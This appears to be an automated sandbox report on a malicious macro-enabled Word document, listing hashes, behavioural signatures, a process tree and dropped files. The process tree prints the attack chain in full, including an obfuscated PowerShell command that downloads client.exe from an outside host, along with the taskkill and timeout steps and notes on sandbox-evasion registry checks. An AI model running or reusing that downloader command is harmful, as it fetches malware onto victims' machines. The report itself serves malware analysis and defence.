Analysis
- max time kernel: 71s
- max time network: 137s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 21-05-2022 03:39
Static task: static1
Behavioral task: behavioral1
- Sample: 2020_1844777494.docm
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: 2020_1844777494.docm
- Resource: win10v2004-20220414-en
General
- Target: 2020_1844777494.docm
- Size: 380KB
- MD5: bbea719b296b81cb70e294246c9d6eae
- SHA1: d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd
- SHA256: 99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832
- SHA512: 40d7d306bfc8fad85f82d7f3fe9b5baec403a953178bf8284043afcb136b2356084151ded8f1e5c75aaa480e30a2aad0235adea09fdf4fffb7341d5890c67d17
Malware Config
Extracted: http://werfpop.nl/client.exe
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3700 | 3196 | explorer.exe | WINWORD.EXE
Blocklisted process makes network request (3 IoCs)
Processes:
flow | pid | process
31 | 4204 | powershell.exe
32 | 4204 | powershell.exe
34 | 4204 | powershell.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | WScript.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Delays execution with timeout.exe (1 IoC)
Processes:
pid | process
1112 | timeout.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Kills process with taskkill (1 IoC)
Processes:
pid | process
760 | taskkill.exe
Modifies registry class (1 IoC)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | explorer.exe
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
pid | process
3196 | WINWORD.EXE
3196 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
pid | process
4204 | powershell.exe
4204 | powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 760 | taskkill.exe
Token: SeDebugPrivilege | 4204 | powershell.exe
Suspicious use of SetWindowsHookEx (4 IoCs)
Processes:
pid | process
3196 | WINWORD.EXE
3196 | WINWORD.EXE
3196 | WINWORD.EXE
3196 | WINWORD.EXE
Suspicious use of WriteProcessMemory (12 IoCs)
Processes:
description | pid | process | target process
PID 3196 wrote to memory of 3700 | 3196 | WINWORD.EXE | explorer.exe
PID 3196 wrote to memory of 3700 | 3196 | WINWORD.EXE | explorer.exe
PID 3632 wrote to memory of 540 | 3632 | explorer.exe | WScript.exe
PID 3632 wrote to memory of 540 | 3632 | explorer.exe | WScript.exe
PID 540 wrote to memory of 1960 | 540 | WScript.exe | cmd.exe
PID 540 wrote to memory of 1960 | 540 | WScript.exe | cmd.exe
PID 1960 wrote to memory of 760 | 1960 | cmd.exe | taskkill.exe
PID 1960 wrote to memory of 760 | 1960 | cmd.exe | taskkill.exe
PID 1960 wrote to memory of 4204 | 1960 | cmd.exe | powershell.exe
PID 1960 wrote to memory of 4204 | 1960 | cmd.exe | powershell.exe
PID 1960 wrote to memory of 1112 | 1960 | cmd.exe | timeout.exe
PID 1960 wrote to memory of 1112 | 1960 | cmd.exe | timeout.exe
Processes (process tree; the level number is the depth in the tree)
- Level 1: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020_1844777494.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Level 2: C:\Windows\explorer.exe
    Command line: explorer.exe C:\ProgramData\Portes.vbs
    - Process spawned unexpected child process
- Level 1: C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - Level 2: C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - Level 3: C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Game_Lods\Groters.cmd" "
      - Suspicious use of WriteProcessMemory
      - Level 4: C:\Windows\system32\taskkill.exe
        Command line: Taskkill /IM "winword.exe" /F
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      - Level 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://werfpop.nl/client.exe', 'C:\Game_Lods\Kritos.exe')
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - Level 4: C:\Windows\system32\timeout.exe
        Command line: TIMEOUT /T 10
        - Delays execution with timeout.exe
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Game_Lods\Groters.cmd (Filesize: 4KB)
  MD5: 0113834f9f390e12db3057891516f47d
  SHA1: 9c7e3a611586726c18f33ca668ce8c8e8ffc2919
  SHA256: 6231b5b04cb2708b8b8446536de8df99391da90bc77449589ab0e5b7660738e6
  SHA512: 0cd634772edb38f33222bc8654257f0959a063fcf5f8cea59d10a4b106746855dfcb974420e3729088e082d71f57e712a17b599ca69b06a0674b531358769fef
- C:\ProgramData\Nolewr.vbs (Filesize: 358B)
  MD5: c16098d503816c750a2b4ce0b179798f
  SHA1: e0a6368150f802e5ece6558b2693fa4ca8eeb4b8
  SHA256: 8ba6c20c21eb3a74998f53f1f7d8aa1a139a98c7413ce7bcb3052280f75b3f7d
  SHA512: e3ca2ce1cc04b37b861489dd1fd21575efe261b436bb29eeed8653f0b5558ac902c8c0f7596bbae91b28854946597da5b385d0614edbf1e8755b955bed698929
- C:\ProgramData\Portes.vbs (Filesize: 68KB)
  MD5: 633d05bd06f41c9aa4281baa46ce38e4
  SHA1: 056a5a05108edbedde196098e07553c5c201368f
  SHA256: a478b1ba294dee526fdf1986402d5e387151394525cc5f523026183197672a77
  SHA512: 268f61d20235696295481651ce70c20164ce4a16f6b6ae4b3e14d86f9e2743904db19e05810991f5928e3e82b08a11a9355a18d711309e1eef118047467a3c7a